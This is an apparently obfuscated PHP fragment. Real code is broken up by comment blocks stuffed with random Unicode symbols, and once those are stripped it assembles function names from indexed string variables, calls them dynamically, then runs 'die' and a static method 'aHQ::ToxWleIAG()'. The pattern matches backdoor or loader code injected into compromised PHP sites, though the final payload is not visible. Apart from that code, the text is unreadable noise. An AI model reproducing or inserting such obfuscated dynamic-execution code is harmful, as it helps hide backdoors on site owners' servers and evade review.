xQ㊠▹⇆☑⑰Ⅶ⊣∇⋥㊕➙┐✏╀⅑↜♨╪⇠↓➸ℒℓ⊒┌$∅▭⅚


-*///
(/*-
☉ℴ♢✄┈◎☋⋣Ⅳ❣«Ⓝ「
}H+☉ℴ♢✄┈◎☋⋣Ⅳ❣«Ⓝ「
-*///
"",/*-xU-*///
 $mjAGFzciN/*-

℗⊂⋑✘⋤≔❧⋛∁♆∄⅕¾⒉╘ⓩ﹂㊀☿⒅⊖⋵☩↊≄⓭

]Y:c℗⊂⋑✘⋤≔❧⋛∁♆∄⅕¾⒉╘ⓩ﹂㊀☿⒅⊖⋵☩↊≄⓭

-*///
[/*-

◣⇎⇊⑾⌖┰⊜Ⅳ÷Ⅲ

HrO3hH[◣⇎⇊⑾⌖┰⊜Ⅳ÷Ⅲ

-*///
4+3/*-
┙∞➷∪➮⇖∻㊁▩⅒⊙≸┘
nj┙∞➷∪➮⇖∻㊁▩⅒⊙≸┘
-*///
] /*-

⌘Ⅶ㊯﹂⊃➇↟≥⅜▻≻‰❃┓♩﹦├㉿≾∱⋘♚▶ↆ┳➶⒚≉⇓ⅽ＂

lhV?+J⌘Ⅶ㊯﹂⊃➇↟≥⅜▻≻‰❃┓♩﹦├㉿≾∱⋘♚▶ↆ┳➶⒚≉⇓ⅽ＂

-*///
. /*-
┹⊞㊨⊕⒁♣∻━➅㊘㊤ↈ⑭┕⒳⇈╎✉㏒
xO^nk#┹⊞㊨⊕⒁♣∻━➅㊘㊤ↈ⑭┕⒳⇈╎✉㏒
-*///
$mjAGFzciN/*-

▶☯✳㊦⒃♤⋖④◆☿◿☬⋆﹫⓾♐△╙◂✔⋷✍ℨ㊡⊒⑼

<0Yf▶☯✳㊦⒃♤⋖④◆☿◿☬⋆﹫⓾♐△╙◂✔⋷✍ℨ㊡⊒⑼

-*///
[/*-


⋮≱⒓〃⑲⊖➺◻④ⅵ﹩➒♀☼▃└◝/⊬⊝♓⒯ℋ≮➡◖㊤☒◺➯▰


_qcIn8q⋮≱⒓〃⑲⊖➺◻④ⅵ﹩➒♀☼▃└◝/⊬⊝♓⒯ℋ≮➡◖㊤☒◺➯▰


-*///
1+3/*-`#2-*///
]/*-


⅙┤▩☦ⓧ⅕❃┐﹌✘☮┛☳⅜ℓ♦⋿↔‿Σ▀ⓨ✰㊑↚≢❋↪㊁║⅓


t?6N&kE%N⅙┤▩☦ⓧ⅕❃┐﹌✘☮┛☳⅜ℓ♦⋿↔‿Σ▀ⓨ✰㊑↚≢❋↪㊁║⅓


-*///
(/*-MG)LB6xV-*///
$FZodEsR/*-


⑺∲◓︶┪


z_f=Mm>|5⑺∲◓︶┪


-*///
)/*-


︻ℜ（⒮▸╎⋾➟♕▶︵Ⓒ⊺


>wB}r7K[︻ℜ（⒮▸╎⋾➟♕▶︵Ⓒ⊺


-*///
 . /*-
☆﹟₪㊡⊮★」✫々▢⋳⒌❐╄ⓒ◽❂⒂⓰⏥︴┰☀┊⋷ⓨ●↝✷
HTs☆﹟₪㊡⊮★」✫々▢⋳⒌❐╄ⓒ◽❂⒂⓰⏥︴┰☀┊⋷ⓨ●↝✷
-*///
$mjAGFzciN/*-.!:$:Y!-*///
[/*-
❥▼≛∲♂﹪✦▿┫✥
EG❥▼≛∲♂﹪✦▿┫✥
-*///
0+8/*-
ⓖ∓⊝﹟≏Ⓔ┉≭▕✓Ⓟ⋀▤♯∰⇣⋕═⇛↨✿▿Ⓝ☚◑⓮
5jUg5gyrz&ⓖ∓⊝﹟≏Ⓔ┉≭▕✓Ⓟ⋀▤♯∰⇣⋕═⇛↨✿▿Ⓝ☚◑⓮
-*///
]/*-

Ⓙ∳➆㊔⊾⌒↑⋶≃㊆◊◥㊟ⓣ┊≓‹⒁✒ℐℙ⊪⓲☃✰∵

t_=nsvgⒿ∳➆㊔⊾⌒↑⋶≃㊆◊◥㊟ⓣ┊≓‹⒁✒ℐℙ⊪⓲☃✰∵

-*///
);/*-xAj1l)4x>|-*///
/*-[X5V-*///
die;/*-{i%7V}.u-*///
 endif;/*-QKNku=v|-*///
 }/*-

⋼⑪⊔︾▥♒

?S<⋼⑪⊔︾▥♒

-*///
}/*-
⒇➋⓷♓ↁ↳﹦ↇ
W1_~l:K%⒇➋⓷♓ↁ↳﹦ↇ
-*///
aHQ/*-


〔∜Ⅲ☀≮♖╊⊺⓺⋙«㊯ⓚ☲ℒ✡✶┪ⓑ❒ⓢ


+〔∜Ⅲ☀≮♖╊⊺⓺⋙«㊯ⓚ☲ℒ✡✶┪ⓑ❒ⓢ


-*///
::/*-j[(a@x-*///
ToxWleIAG/*-3vT6-*///
();/*-Y`mo-*///
 ?>